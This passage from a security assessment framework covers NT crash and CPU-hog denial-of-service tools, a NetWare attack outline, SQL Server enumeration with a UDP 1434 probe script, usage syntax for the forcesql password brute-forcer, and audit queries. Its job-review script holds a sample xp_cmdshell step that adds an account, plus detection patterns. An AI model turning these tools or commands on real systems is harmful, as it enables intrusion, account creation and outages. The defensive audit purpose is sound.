Bryce Cogswell, exploits implementation flaws in NTOSKRNL, the kernel image loaded from
NTOSKRNL.EXE that contains the majority of the OS components executed in kernel mode. By invoking
these functions with illegal, out-of-range or out-of-bounds parameters, NT crashes.
Executed on a server or domain controller, this program causes a denial of service and can
result in data loss.
Pre-requisite[s]
Steps to be performed
1. Run ntcrash on the system
Examples/Results
c:\> ntcrash -n
Analysis/Conclusion/Observation
The unsecured system succumbed to the attack and rebooted. An attacker who needs a reboot after
installing a Trojan only has to crash NT this way.
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
F.16.36
Denial of Service: CpuHog
Description
CpuHog is a small program written by Mark Russinovich that uses NT's priority mechanism to hang
the system. It sets priority 15 on itself and then enters an infinite WHILE loop. This hangs NT so
that no other program, including Task Manager, can be started. Strangely, no special privileges
are needed to do this. Microsoft addressed the problem in NT 4.0 Service Pack 2 and later by
allowing priority aging up to level 15, which means that CpuHog now only slows the system down
considerably; a user program can still set its priority without special privileges.
Intent: the intention is the same as with NTCrash (see above), i.e. the availability of the
system will probably drop to zero.
Pre-requisite[s]
Steps to be performed
1. Run Cpuhog on the system
Examples/Results
c:\>cpuhog
Analysis/Conclusion/Observation
The unsecured system became unserviceable after the initial prompt was confirmed and needed a
reboot. An attacker who needs a reboot after installing a Trojan only has to crash NT this way.
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
F.16.37
Rollback Attack
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
G NOVELL NETWARE SECURITY ASSESSMENT
Description
[Text]
Objective
• Understanding Novell NetWare security issues and how to safeguard against them
• Following a structured approach for Novell NetWare system penetration/audit
• Gaining access and escalating privileges
• Going beyond admin and spreading the attack further
Expected Result[s]
• List of live hosts
• Processes running on hosts
• List of users/shares
• Version of the operating system and its patch level
• Vendor of the operating system
• List of vulnerabilities
• List of compromised hosts
Methodology
[Description]
1. Identify Live Hosts
2. Identify Ports and Services
3. Enumeration Attack
   a. Attaching
   b. Identify Bindery
   c. Identify Trees
   d. Identify Users
4. Examine Common Protocols
5. Examine Novell
   • Remote Attacks
     a. Password Attacks
     b. NDS Snoop
     c. Detecting Lockout
     d. Pilfering the Information
     e. NetWare Perl Attack
     f. FTP Attack
     g. Buffer Overflows
     h. Web Server Attacks
     i. NetBasic Directory Traversal
     j. iManage/eMFrame
     k. NetWare Remote Manager Attack
     l. Spoofing Attacks (Pandora)
   • Local Attacks
     a. rconsole Attack
     b. NDS Files Attacks
     c. Back Dooring Novell
H DATABASE SECURITY ASSESSMENT
Oracle, MS SQL Server and MySQL are the common databases. The default ports of these services are
as follows:

Service                 Port   Protocol
Oracle TNS listener     1521   TCP
Oracle TNS (alternate)  1526   TCP
Oracle TNS (alternate)  1541   TCP
Microsoft SQL Server    1433   TCP
Microsoft SQL SSRS      1434   UDP
Microsoft SQL hidden    2433   TCP
MySQL                   3306   TCP
This section covers followings:
1. Remote Enumeration of Databases
2. Brute-forcing databases
3. Process manipulation attack
4. End-to-end audit of databases
H.1 MICROSOFT SQL SERVER SECURITY ASSESSMENT
The Microsoft SQL Server service usually listens on TCP port 1433, although this can be changed
through the SQL Server Network Utility. That is not an obstacle: the SQL Server Resolution
Service (SSRS), which reports the instances running on a machine, listens on UDP port 1434 and
returns the IP address and port number of each SQL Server instance on that system, so you can
connect to it directly.
H.1.1.1 SQL SERVER ENUMERATION
An automated tool that does this is SQLPing: it takes a range of IP addresses as input, queries
UDP 1434 on each live host and reports the SQL Server instances, if any, running there. The tool
can be downloaded from http://www.sqlsecurity.com/uploads/sqlping.zip.
The example below shows the sqlping utility in use against a SQL Server 2000, revealing the
server name, database instance name and clustering information, along with version details and
network port/named pipe information.
H.1.1.1.1 USING SQLPING TO ENUMERATE A MICROSOFT SQL SERVER
D:\SQL> sqlping 192.168.0.51
SQL-Pinging 192.168.0.51
Listening....
ServerName:dbserv
InstanceName:MSSQLSERVER
IsClustered:No
Version:8.00.194
tcp:1433
np:\\dbserv\pipe\sql\query
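The enumeration above works because SSRS answers a single-byte UDP datagram with a text record per instance. The following Python is an added example (it is not SQLPing nor part of ISSAF) that sends that request and decodes the reply by hand. The message layout is the one in Microsoft's MC-SQLR specification: the client sends byte 0x03 (CLNT_UCAST_EX), the server replies with byte 0x05, a 16-bit little-endian length, then an ASCII string of key;value pairs with each instance terminated by ";;". The host name dbserv and the reply bytes are constructed here to mirror the sqlping output above, and the version-to-product table is a convenience of this example.

```python
"""Query and decode the SQL Server Resolution Service on UDP 1434 (added example)."""
import socket
import struct

CLNT_UCAST_EX = b"\x03"    # "describe every instance on this host"
SVR_RESP = 0x05            # first byte of the server's answer

# Major version number -> product, so a probe result can be triaged at a glance.
VERSION_FAMILY = {7: "SQL Server 7.0", 8: "SQL Server 2000",
                  9: "SQL Server 2005", 10: "SQL Server 2008"}


def parse_svr_resp(data: bytes) -> list[dict]:
    """Decode one SVR_RESP datagram into a list of instance dictionaries."""
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRS SVR_RESP message")
    (size,) = struct.unpack_from("<H", data, 1)         # RESP_SIZE, little-endian
    body = data[3:3 + size].decode("ascii", errors="replace")
    instances = []
    for record in body.split(";;"):                      # one record per instance
        fields = record.strip(";").split(";")
        if len(fields) < 2:
            continue                                     # trailing empty record
        pairs = dict(zip(fields[0::2], fields[1::2]))    # key;value;key;value...
        major = int((pairs.get("Version", "0").split(".")[0]) or 0)
        pairs["Family"] = VERSION_FAMILY.get(major, "unknown")
        instances.append(pairs)
    return instances


def probe(host: str, timeout: float = 2.0) -> list[dict]:
    """Send CLNT_UCAST_EX to host:1434/udp and decode what comes back (needs network)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(CLNT_UCAST_EX, (host, 1434))
        data, _peer = sock.recvfrom(65535)
    return parse_svr_resp(data)


# Constructed reply mirroring the sqlping output above; not a real capture.
SAMPLE_BODY = (b"ServerName;dbserv;InstanceName;MSSQLSERVER;IsClustered;No;"
               b"Version;8.00.194;tcp;1433;np;\\\\dbserv\\pipe\\sql\\query;;")
SAMPLE_RESP = bytes([SVR_RESP]) + struct.pack("<H", len(SAMPLE_BODY)) + SAMPLE_BODY

if __name__ == "__main__":
    for inst in parse_svr_resp(SAMPLE_RESP):
        print(f"{inst['ServerName']}\\{inst['InstanceName']} "
              f"{inst['Family']} build {inst['Version']} tcp/{inst.get('tcp', '-')}")
```

Running probe() against a range of hosts reproduces what sqlping does; the reply is unauthenticated, so the same service also tells an attacker which port an instance moved to after the "hide server" option changed it. This is one reason UDP 1434 should be filtered at the perimeter.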
MetaCoretex (http://www.metacoretex.com/index.php) is an entirely Java-based vulnerability
scanning framework with special emphasis on databases. Probe objects are written in Java by
extending an easy-to-extend AbstractProbe class, and probe generators make writing simple probes
almost automatic. Some useful remote tests are:
• MSSQL Audit Level: checks the MSSQL logon auditing configuration. It can only do so if the JDBC
  Connection stored in mssql/connection has sufficient privileges.
• MSSQL Authentication Tester: attempts to connect to an available MSSQL database using the
  user-specified connection information. On success the probe puts the JDBC Connection object
  into the knowledge base (KB) under the key mssql/connection.
• MSSQL C2 Audit: attempts to determine whether C2 auditing is enabled. It can only do so if the
  JDBC Connection stored in mssql/connection has sufficient privileges.
• MSSQL Default DBs: attempts to determine whether any of the default databases are still present.
• MSSQL Login Mode: checks the current LoginMode configuration of MSSQL. It can only do so if the
  JDBC Connection stored in mssql/connection has sufficient privileges.
• MSSQL Login Stats: attempts to determine current login statistics such as the users currently
  logged in and logins/logouts per second.
H.1.1.2 SQL SERVER BRUTE FORCE
forcesql and sqlbf are two excellent remote SQL Server brute-force utilities that run from the
Win32 command line; they are available at:
http://www.sqlsecurity.com/uploads/forcesql.zip
http://www.sqlsecurity.com/uploads/sqlbf.zip
The forcesql tool is written by one of my team members and the latest version can always be
found at http://www.nii.co.in/resources/tools.html
The features of forcesql v2.0 are:
1. Easy command-line control
2. Dictionary attack
3. Brute force attack
4. Much faster than v1.0
5. A port other than 1433 can be chosen
The tool only needs the IP address or machine name of the SQL Server and the user ID you wish to
check. For a brute force attack, enter the characters to search over in the file 'charset.txt'
and give the maximum password length on the command line (see Usage below). For the dictionary
attack, make sure the dictionary file 'words.txt' is in the same directory as forceSQL.exe.
Usage:
1. Dictionary attack:
forceSQL [IP] [UserID] -d
2. Brute force attack:
forceSQL [IP] [UserID] -b [length]
3. If the port is other than 1433, append it to the IP separated by a comma:
forceSQL [IP,port] [UserID] -b [length]
Example: for a ten-character brute force attack on a SQL Server running at 10.0.0.1 on port 5001:
forceSQL 10.0.0.1,5001 -b 10
New Features:
The tremendous increase in speed of v2.0 over v1.0 is because we are no longer using any
SQL/ODBC API. We spent some time figuring out the packet structure of the authentication packet
as it flows over the wire. We then replicated the packet and used that to carry out the
authentication, thus bypassing everything else and going directly to the network layer. This
greatly reduced the overhead of allocating and using the SQL handles and the SQL API. It now
checks more than 40 passwords per second depending on network connectivity. The second
significant feature we have added is brute forcing in addition to the existing dictionary attack.
The sqlbf utility is especially useful because it guesses SQL Server username and password
combinations over both the TCP/IP (port 1433) and named pipe (ports 139 and 445) transports.
The SQL administrator account under Microsoft SQL Server is called sa. Many SQL Server 6.0, 6.5,
7.0 and 2000 installations can be found with no password set on it; from SQL Server 2000 Service
Pack 3 onwards, setup no longer permits the sa password to remain blank.
H.1.1.2.1 SQLAT
SQLAT is a suite of tools useful for pentesting a MS SQL Server. The tools are still in
development but tend to be quite stable.
The tools perform dictionary attacks, upload files, read the registry and dump the SAM. They do
this by wrapping extended stored procedures. There is also a tool that performs a minimal analysis
of a SQL Server with HTML output. You need to be 'sa' to run some of the tools, but this usually
isn't a problem.
The tool temporarily restores xp_cmdshell if it has been removed but its DLL is still left on the
system. SQLAT is based on the FreeTDS library and, as of version 1.0.6, supports NTLM integrated
login. It does not support named pipes yet.
Requires:
• FreeTDS http://www.freetds.org
• pwdump2 http://razor.bindview.com/tools/files/pwdump2.zip
H.1.1.3 SQL SERVER POST-AUTHENTICATION
Once you have some type of access to the server, preferably as a super-user, or have managed a
privilege escalation attack, review the SQL Server configuration for the following issues:
H.1.1.4 AUTHENTICATION MODE
SQL Server has two authentication modes: one where users are authenticated only with their
Windows NT credentials, and one where they log in with either Windows NT or SQL Server native
credentials.
Windows Authentication Mode:
Windows Authentication Mode is the default authentication mode in SQL Server 2000. In
this mode, SQL Server 2000 relies solely on Windows to authenticate users. Windows
users or groups are then granted access to SQL Server. Connections made to the server
using this mode are known as trusted connections. When Windows Authentication Mode
is used, the database administrator allows users to access the computer running SQL
Server by granting them the right to log in to SQL Server 2000. Windows security
identifiers (SIDs) are used to track Windows authenticated logins. It is strongly
recommended that this mode be used for greater security. It also has ease-of-use
advantages as it reduces the administrative burden of creating two sets of users – one
for Windows NT, and the other for SQL Server – and assigning rights separately.
Mixed Mode Authentication:
In Mixed Mode, users can be authenticated by Windows Authentication or by SQL
Server Authentication. Users who are authenticated by SQL Server have their username
and password pairs maintained within SQL Server. These pairs are stored in the
sysxlogins system table of the master database.
In SQL Server 2000, Mixed Mode relies on Windows to authenticate users when the
client and server are capable of using NTLM (standard Windows NT 4.0 or Windows
2000 logon using challenge/response) or Kerberos logon authentication protocols. If the
client is unable to use a standard Windows logon, SQL Server requires a username and
password pair, and compares this pair against those stored in its system tables.
Connections that rely on username and password pairs are called non-trusted
connections.
Mixed mode is supplied for backward compatibility and when SQL Server 2000 is
installed on the Windows 98 or Windows Me operating systems, where Trusted
connections are not supported.
To determine the authentication mode, you can execute the following query:
exec xp_loginconfig 'login mode'
H.1.1.5 LOGIN AUDIT LEVELS:
Auditing helps in keeping track of access to the SQL Server. The level of auditing can be
checked using the query:
exec xp_loginconfig 'audit level'
Login Audit Levels

Value     Description
All       Logs both successful and failed login attempts. This is the preferred auditing setting.
Failure   Only failed login attempts to SQL Server are logged.
Success   Only successful login attempts to SQL Server are logged.
None      Not acceptable at all; turn auditing on immediately and set it to 'all'.
H.1.1.6 DATABASE INITIALIZATION CONFIGURATION
You may view the server configuration parameters by issuing the following query:
exec sp_configure
Check for the values of the following parameters:
'allow updates'
Ad hoc updating of system tables is very critical as it can disrupt a running instance of SQL
Server or cause loss of data. Updates to system tables should therefore be strictly prohibited,
not only for security reasons but also for stability. The default for 'allow updates' is 0, which
prevents ad hoc access to system tables even if the user has the appropriate permissions. If its
value is set to 1, system tables can be updated with ad hoc queries, and a user can also create
stored procedures that update system tables. Stored procedures created while 'allow updates' is
enabled retain the ability to update system tables even after the option is disabled again.
'c2 audit mode'
SQL Server 2000 is C2 compliant and provides extensive auditing facilities as per the C2
standard. This setting is 0 by default; it is recommended to set it to 1. See the section on
Auditing for more information.
'remote access'
This option controls logins from remote servers running instances of SQL Server and is used with
remote stored procedures. Set remote access to 1 to allow logins from remote servers, or to 0 to
secure a local server and prevent access from a remote server.
If this setting is absolutely necessary, check the credentials of the remote users and minimise
their access to the database tables and procedures.
'scan for startup procs'
When the SQL Server service starts it checks whether this setting is enabled. If so, SQL Server
scans for and executes the stored procedures configured to run at startup. Review the startup
stored procedures for Trojans or any other malicious code.
H.1.1.7 SCHEDULED JOBS
SQL Server automatically executes scheduled jobs at a particular time or interval. Verify the jobs
and review the code of any that call user-defined stored procedures; this is a good place to
launch malicious code without being noticed. The job definitions are stored in the msdb system
database:
exec msdb..sp_help_job
H.1.1.8 EXTENDED AND STORED PROCEDURES
Ensure that the extended stored procedure xp_cmdshell is removed. xp_cmdshell is a very critical
procedure that allows execution of operating system commands in the security context of the SQL
Server service account.
Check the permissions on this procedure and ensure that only an authorised role such as sysadmin
has execute permission:
exec sp_helprotect 'xp_cmdshell'
To drop this extended procedure (do not do this during an assessment):
exec sp_dropextendedproc 'xp_cmdshell'
The same security measures apply to the other extended procedures listed below. It may not be
feasible to drop them, but execute access to them must be restricted to the sysadmin role.
Registry access:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
Instance-scoped registry access:
xp_instance_regaddmultistring
xp_instance_regdeletekey
xp_instance_regdeletevalue
xp_instance_regenumkeys
xp_instance_regenumvalues
xp_instance_regread
xp_instance_regremovemultistring
xp_instance_regwrite
Statement execution, SQL Agent and server management:
sp_MSsetalertinfo
sp_MSSetServerProperties
sp_runwebtask
sp_add_job
sp_add_jobstep
sp_add_jobserver
sp_start_job
sp_get_sqlagent_properties
xp_readerrorlog
xp_execresultset
xp_printstatements
xp_displayparamstmt
All support for SQL Mail should be removed by dropping the following extended stored procedures:
xp_stopmail, xp_startmail, xp_deletemail, xp_sendmail
Check the permissions granted on all stored and extended procedures owned by dbo in master and
msdb (run the query in each database in turn; in SQL Server 2000 dbo has uid 1, so the object
owner is matched with user_id('dbo') rather than a literal):
use master
select distinct O.name, U.name as grantee from sysobjects O, sysprotects P, sysusers U
where O.uid = user_id('dbo') and O.xtype in ('X','P') and O.id = P.id and P.uid = U.uid
H.1.1.8.1 STARTUP STORED PROCEDURES
Check the stored procedures that are marked to execute when the server starts. Study the code of
each procedure and confirm that nothing malicious or unauthorised is present:
select name from sysobjects where xtype in ('X','P') and objectproperty(id, 'ExecIsStartup') = 1
H.1.1.9 USERS AND ROLES
Gather the list of all SQL logins and ensure that each login maps to an actual person:
use master
select * from sysxlogins
Ensure that all logins are genuine users and that there are no dummy accounts such as 'test' or
'vendor'. Ensure that there is no 'guest' user in any database other than 'master', 'tempdb' and
'msdb' (it cannot be removed from those).
Check the logins whose default database is 'master'. The 'master' database contains the system
tables and system stored procedures used by SQL Server to run the service. Tampering with data in
this database may stop SQL Server from running, and a user could change the stored procedures or
update or delete system tables for privilege escalation. It is therefore advisable to keep
low-privileged users away from 'master' and to allow access only to the security and system
administrators.
select name from master..sysxlogins where dbid=1
Gather the list of Windows-authenticated logins (see the section on Authentication Modes above),
check that these are valid users for access to SQL Server, and review their roles and privileges:
select name, password, loginname from master..syslogins where isntname=1
Check whether any logins have a null password:
select name from master..sysxlogins where password is NULL
Windows logins also show a NULL password because SQL Server stores none for them, so restrict the
check to SQL Server authenticated logins:
select name from master..syslogins where isntname=0 and password is NULL
To view the list of users for a particular database:
use [database_name]
exec sp_helpuser
Check that all the users are valid database users and that they belong to valid roles.
Check the roles and privileges of users in the critical 'master' and 'msdb' databases, as well as
those in your current database:
exec master..sp_helpuser
exec msdb..sp_helpuser
Database roles are identified by the GroupName column of the output.
Orphaned Windows logins
Check for SQL Server Windows logins that have been deleted from Windows but still exist in SQL
Server. This is not an immediate threat, but someone with UPDATE permission on the sysxlogins
table could change his own SID to that of the deleted Windows user and inherit all of that user's
rights and permissions. Orphaned Windows logins also create accountability problems.
exec master..sp_validatelogins
Mismatched user IDs
Ensure that for each user the login name in SQL Server and the user name in the databases are the
same. This is not a security issue but creates problems for DBAs when assigning permissions.
use [database name]
select l.name as 'Login name', u.name as 'User name' from master..sysxlogins l, sysusers u
where l.sid = u.sid and l.name <> u.name and l.name <> 'sa'
Orphaned user IDs
Check for orphaned database users that exist in a database but are not associated with any SQL
login. Normally this does not happen, because when a SQL login is deleted its associated database
users are deleted as well. However, when a database with existing users is attached to a SQL
Server, there are no logins associated with those users and they must be treated as orphaned.
use [database name]
select name from sysusers where name not in (select u.name from sysusers u, master..syslogins l
where u.sid = l.sid) and sid is not null and name not in ('guest','dbo')
Do not use the 'sa' account
It is strongly recommended not to use the 'sa' account, given the history of attacks against it.
Instead, assign it a very strong password and never use it to log in for administrative tasks. If
the server is configured for Windows Authentication mode, the 'sa' account cannot be used to log
in at all.
SQL Server 2000 does not provide password security measures such as password complexity, password
history, minimum password age or maximum password age for SQL Server logins. You may therefore
need to use utilities such as EnforcePass, available at http://www.nii.co.in/research/tools.html
H.1.1.10 ROLES
Roles in SQL Server are similar to groups in Windows domains. They allow users who perform the
same function to be grouped together logically: the permissions these users need are the same and
can be granted to the role instead of to each user individually, which greatly reduces the
overhead of repeatedly granting, denying and revoking permissions to individual users. In SQL
Server, roles are implemented per database, apart from the server roles discussed below. A
hierarchy of roles can also be created to represent varying levels of privilege.
- Public Role:
The public role exists in every database, including the system databases master, msdb,
tempdb and model. The public role provides the default permissions for users in a
database and cannot be deleted. Functionally, it can be compared to the Everyone
group in the Windows NT 4.0 environment. Every database user is a member of this role
automatically; therefore, users cannot be added or removed from this role.
- Predefined Roles:
SQL Server 2000 includes several predefined roles. These roles have predefined
implied permissions, which cannot be granted to other user accounts. There are two
types of predefined roles: fixed server roles and fixed database roles.
a. Fixed Server Roles:
Fixed server roles are server-wide in their scope. They exist outside of the databases.
Each member of a fixed server role is able to add other logins to that same role.
Note: All members of the Windows BUILTIN\Administrators group (the local
administrator’s group) are members of the sysadmin role by default.
Fixed Server Role | Description
sysadmin          | Performs any activity in SQL Server
serveradmin       | Configures server-wide configuration options, shuts down the server
setupadmin        | Manages linked servers and startup procedures
securityadmin     | Manages server-wide security settings, including linked servers and CREATE DATABASE permissions; resets passwords for SQL Server authentication logins
processadmin      | Terminates processes running in SQL Server
dbcreator         | Creates, alters, drops, and restores any database
diskadmin         | Manages disk files
bulkadmin         | Allows a non-sysadmin user to run the BULK INSERT statement
Only highly privileged and trusted users should be members of these roles. To determine membership of any fixed server role, query the corresponding flag column of master..syslogins (sysadmin, securityadmin, serveradmin, setupadmin, processadmin, diskadmin, dbcreator, bulkadmin):
select name, loginname from master..syslogins where [fixed_server_role]=1
For instance, to determine members of the sysadmin role:
select name, loginname from master..syslogins where sysadmin=1
It is recommended that SQL Server DBAs be granted access to SQL Server through Windows group membership, and that this group be made a member of the sysadmin server role. Bear in mind, however, that a Windows administrator can then give anyone sysadmin rights on SQL Server 2000 simply by adding them to that Windows group. Where that is not acceptable, assign individual Windows accounts to the sysadmin role instead.
b. Fixed Database Roles:
Fixed database roles are defined at the database level and exist in each database. Members of the db_owner and db_securityadmin roles can manage fixed database role membership; however, only members of db_owner can add others to the db_owner fixed database role.
Fixed Database Role | Description
db_owner            | Performs all maintenance and configuration activities in the database
db_accessadmin      | Adds or removes access for Windows users, groups, and SQL Server logins
db_datareader       | Reads all data from all user tables
db_datawriter       | Adds, deletes, or changes data in all user tables
db_ddladmin         | Runs any Data Definition Language (DDL) command in a database
db_securityadmin    | Modifies role membership and manages permissions
db_backupoperator   | Backs up the database
db_denydatareader   | Cannot read any data in user tables within a database
db_denydatawriter   | Cannot add, modify, or delete data in any user tables or views
To determine membership of these roles for any given database:
exec [database_name]..sp_helprolemember '[fixed_database_role]'
For instance, to determine membership of the db_owner role in the msdb database:
exec msdb..sp_helprolemember 'db_owner'
c. User-Defined Roles:
User-defined roles provide an easy way to manage permissions in a database when a group of users performs a specified set of activities in SQL Server 2000 and there is no applicable Microsoft Windows group, or when the database administrator does not have permission to manage the Windows user accounts. In these situations, user-defined roles give the database administrator the same flexibility as Windows groups. User-defined roles apply only at the database level and are local to the database in which they were created.
To determine membership of a user-defined role, issue the same query as above:
exec [database_name]..sp_helprolemember '[user_defined_role]'
d. Application Roles:
Application roles allow the database administrator to restrict access to data based on the application the user is using: the application, rather than the user, is what gets authenticated. When an application connects to SQL Server 2000 it executes the sp_setapprole stored procedure, passing the application role name and the role's password (the password can be obfuscated on the wire with the procedure's encrypt option). The permissions of the connecting user are dropped for that connection and the security context of the application role is assumed. Anyone who learns the role password, for example by extracting it from the application, can therefore obtain the role's permissions directly, so the password must be protected like any other credential.
To list application roles:
select * from sysusers where issqlrole = 1 and isapprole = 1
H.1.1.11 USER PRIVILEGES AND ACCESS RIGHTS
Permissions within a database are always granted to database users, roles, and Windows users or groups, never directly to SQL Server 2000 logins. The methods used to set the appropriate permissions for users or roles within a database are granting, denying and revoking permissions.
The GRANT statement gives a user permission on a given object.
The DENY statement allows an administrator to deny an object or statement permission to a user or role. As with Windows permissions, DENY takes precedence over any GRANT the user receives directly or through role membership.
The REVOKE statement removes a permission that was granted (or denied) earlier; it does not itself block access.
Permissions can also be granted using the WITH GRANT OPTION clause. This allows the grantee to become a grantor in turn and pass that permission on to other users. This must be used sparingly, and permissions granted WITH GRANT OPTION must be audited carefully:
select table_name, grantor,grantee, table_catalog, privilege_type, is_grantable
from information_schema.table_privileges where is_grantable ='YES'
As stated earlier, the PUBLIC role is the default general role and every user is a member of it, so permissions granted to PUBLIC must be carefully audited. Ideally all permissions are removed from PUBLIC and the required permissions are granted to specific roles according to their function. To view the permissions held by PUBLIC in a given database:
select table_name, grantor,grantee, table_catalog, privilege_type, is_grantable
from [database_name].information_schema.table_privileges where grantee =
'PUBLIC'
To view the permissions granted to a given user (the first parameter of sp_helprotect is the object or statement name, so it is passed as NULL here):
exec sp_helprotect NULL, 'username'
Statement permissions
These are the permissions required to create objects such as tables and views. The user who creates an object becomes its owner and has all permissions on it. These are critical permissions and therefore only authorized users should hold them. Examples are CREATE DATABASE, CREATE PROCEDURE, CREATE RULE, CREATE DEFAULT, CREATE TABLE, CREATE FUNCTION, CREATE VIEW, BACKUP DATABASE and BACKUP LOG. To see who holds a statement permission in a database:
use [database name]
exec sp_helprotect 'CREATE TABLE'
Temporary tables and procedures
Check all temporary tables and procedures existing in the databases. These objects are created in the tempdb database. Global temporary tables, identified by a ## prefix, are accessible to all users by default and therefore must not contain any critical data. Temporary stored procedures should be reviewed for malicious code.
select substring(name,1,30) as name, case xtype when 'P' then 'Stored proc' when
'U' then 'User table' end as 'ObjectType', crdate as 'created on', refdate as 'referred
on' from tempdb..sysobjects where name like '#%'
Ad-hoc queries by Data Providers
Disable ad hoc queries for the data providers listed below. This functionality is dangerous because it allows the use of OPENROWSET and OPENDATASOURCE, which fetch data into SQL Server over an OLE DB connection; that path has been used to trigger buffer overflow vulnerabilities in the providers and can lead to a full compromise of SQL Server. Only where an application explicitly requires ad hoc queries through a particular provider should that provider be left enabled.
- Microsoft OLE DB Provider for SQL Server (SQLOLEDB)
- Microsoft OLE DB Provider for Microsoft Jet (Microsoft.Jet.OLEDB.4.0)
- Microsoft OLE DB Provider for Oracle (MSDAORA)
- Microsoft OLE DB Provider for Microsoft Active Directory Service (ADSDSOObject)
- Microsoft OLE DB Provider for Indexing Service (MSIDXS)
- Microsoft OLE DB Provider for Microsoft Site Server (MSSEARCHSQL)
- Microsoft OLE DB Provider for ODBC (MSDASQL)
To prevent such attacks, create a DWORD registry value DisallowAdhocAccess set to 1 under the provider's key, for example
HKLM\Software\Microsoft\MSSqlServer\Providers\SQLOLEDB
(for a named instance the Providers key sits under HKLM\Software\Microsoft\Microsoft SQL Server\[instance name]). Ensure that DisallowAdhocAccess is set to 1 for every data provider.
SQL Agent Security
Perform the following checks for SQL Server Agent:
Ensure that the SQL Agent service is not running as LocalSystem or as a Windows administrator account.
Ensure that only sysadmins are allowed to add scheduled jobs.
Ensure that the login SQL Agent uses to connect to SQL Server is not sa or a member of the sysadmin role.
use msdb
exec sp_get_sqlagent_properties
Check the owner and originating server of each job and ensure they are authorized to schedule jobs. To list all scheduled jobs:
use msdb
exec sp_get_composite_job_info
Review the SQL commands in each scheduled job for malicious code:
use msdb
exec sp_help_jobstep [job_id]
You may also view all of this information through Enterprise Manager. Go to Management, right-click on SQL Server Agent and open Properties. The General tab shows which user account the Agent runs as.
In the same window, go to the Job System tab and ensure that "Only users with SysAdmin privileges can execute CmdExec and ActiveScripting job steps" is selected.
Go to the Connection tab and ensure that SQL Agent does not authenticate to SQL Server using the 'sa' login.
Also review the Alerts that already exist and the Jobs that are scheduled.
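The job review described above can be scripted once the job list and the output of sp_help_jobstep have been exported. The Python below is an added example written for this page, not an ISSAF or Microsoft script: it flags jobs owned by logins that are not on the authorized list, CmdExec and ActiveScripting steps (which run under the Agent's service account and must be restricted to sysadmins), and T-SQL steps that reach outside the database engine. The row layout, the pattern list and the sample jobs are this example's own assumptions.

```python
"""Offline review of SQL Server Agent job steps for the checklist above:
unauthorized job owners, CmdExec / ActiveScripting steps and T-SQL steps
that call out of the engine. Added example; the rows are constructed."""
import re

# Subsystems that run OS commands or a script engine under the Agent's
# service account; the checklist requires these to be sysadmin-only.
OS_SUBSYSTEMS = {"CmdExec", "ActiveScripting"}

# Patterns worth a manual look in a T-SQL step. This list is the example's
# own starting point (assumption), not an exhaustive catalogue.
SUSPICIOUS_TSQL = {
    r"\bxp_cmdshell\b": "OS command execution via xp_cmdshell",
    r"\bsp_OA(Create|Method|GetProperty|SetProperty)\b": "OLE automation",
    r"\bOPEN(ROWSET|DATASOURCE)\s*\(": "ad hoc remote data access",
    r"\bxp_reg(write|deletekey|deletevalue|addmultistring)\b": "registry modification",
    r"\bsp_add(srvrolemember|rolemember|login)\b": "login or role membership change",
    r"\bBULK\s+INSERT\b": "bulk load from a file",
}


def review_job_steps(steps, authorized_owners):
    """steps: dicts with job_name, owner, step_id, subsystem, command (the
    columns of the job list and sp_help_jobstep that matter here).
    Returns (job_name, step_id, finding) tuples; the owner is checked once
    per job, on its first step."""
    findings, owner_checked = [], set()
    for s in steps:
        job, step = s["job_name"], s["step_id"]
        if job not in owner_checked:
            owner_checked.add(job)
            if s["owner"] not in authorized_owners:
                findings.append((job, step, f"owner {s['owner']!r} is not authorized to schedule jobs"))
        if s["subsystem"] in OS_SUBSYSTEMS:
            findings.append((job, step, f"{s['subsystem']} step runs under the Agent service account"))
        elif s["subsystem"] == "TSQL":
            for pattern, why in SUSPICIOUS_TSQL.items():
                if re.search(pattern, s["command"], re.IGNORECASE):
                    findings.append((job, step, why))
    return findings


# Constructed sample rows (not from a real server).
SAMPLE_STEPS = [
    {"job_name": "Nightly backup", "owner": "CORP\\sqlops", "step_id": 1,
     "subsystem": "TSQL", "command": "BACKUP DATABASE Sales TO DISK = 'E:\\bak\\sales.bak'"},
    {"job_name": "Reindex", "owner": "CORP\\sqlops", "step_id": 1,
     "subsystem": "TSQL", "command": "DBCC DBREINDEX ('dbo.Orders')"},
    {"job_name": "Cleanup", "owner": "webapp", "step_id": 1,
     "subsystem": "CmdExec", "command": "del /q D:\\exports\\*.csv"},
    {"job_name": "Cleanup", "owner": "webapp", "step_id": 2,
     "subsystem": "TSQL", "command": "EXEC master..xp_cmdshell 'net user helpdesk P@ss /add'"},
]
AUTHORIZED_OWNERS = {"CORP\\sqlops"}  # assumed list of logins allowed to own jobs

if __name__ == "__main__":
    for job, step, finding in review_job_steps(SAMPLE_STEPS, AUTHORIZED_OWNERS):
        print(f"{job} step {step}: {finding}")
```

The pattern list is deliberately short; a hit means "read this step", not "this step is malicious", and any job whose owner is not on the authorized list is reported regardless of what its steps do.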
H.2 ORACLE SECURITY ASSESSMENT
One of the most vulnerable and high impact attack vectors for an Oracle database is the
TNS Listener service. The Transparent Network Substrate (TNS) protocol is used by
Oracle clients to connect to database instances via the TNS Listener service. The
service listens on TCP port 1521 by default. There exist numerous vulnerabilities in this
service, ranging from information disclosure to buffer overflows. A number of these can
be exploited without any authentication. Even if authentication is required, the large
number of default Oracle accounts results in those attacks being successful as well.
H.2.1.1 TNS LISTENER ENUMERATION AND INFORMATION LEAK ATTACKS
The listener service has its own authentication mechanism and is controlled and administered using the lsnrctl utility. The default configuration of the TNS Listener has no password set, so anyone who can reach the port can issue administrative commands to it; whether it logs or traces depends on the listener.ora settings, which the status output below reveals. Database security vendor Integrigy offers a tool for checking listener security that can be downloaded from http://www.integrigy.com/ .
tnscmd can be used to speak, on a very simple level, with Oracle's TNS listener. It is a Perl script available at http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd.
H.2.1.1.1 PINGING THE TNS LISTENER
You can use tnscmd.pl to issue various commands to the TNS Listener service. To ping the host and see whether it is actually running tnslsnr (ping is the default command):
unix% tnscmd -h oraclebox.example.com -p 1521
